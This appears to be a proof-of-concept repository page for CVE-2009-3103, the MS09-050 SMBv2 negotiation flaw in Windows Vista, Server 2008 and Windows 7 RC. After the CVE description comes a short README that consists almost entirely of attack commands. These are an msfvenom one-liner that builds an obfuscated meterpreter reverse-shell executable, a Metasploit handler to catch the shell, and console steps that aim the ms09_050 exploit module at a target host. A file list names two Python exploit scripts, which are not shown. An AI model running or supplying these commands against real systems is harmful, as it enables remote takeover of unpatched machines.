CVE-2009-3103 PoC — Microsoft Windows Vista and Windows 7 Malformed SMB Packet Remote Denial-of-Service Vulnerability

Associated Vulnerability
Title: Microsoft Windows Vista and Windows 7 Malformed SMB Packet Remote Denial-of-Service Vulnerability (CVE-2009-3103)
Description: Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
Description
CVE-2009-3103 ms09-050
Readme
# ms09-050_CVE-2009-3103
CVE-2009-3103 ms09-050

# One liner to create/generate a payload for Windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --bad-chars "\x00" --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/

# One liner start meterpreter
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.1.1;set LPORT 4444;run;"

msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 192.168.1.1
msf exploit(ms09_050_smb2_negotiate_func_index) > run

File Snapshot

[4.0K] /data/pocs/27cbce6c5e8a2c90c2768157a6662c3ce883ae33
├── [4.7K] MS09_050_2.py
├── [5.9K] ms09-050.py
└── [ 939] README.md

0 directories, 3 files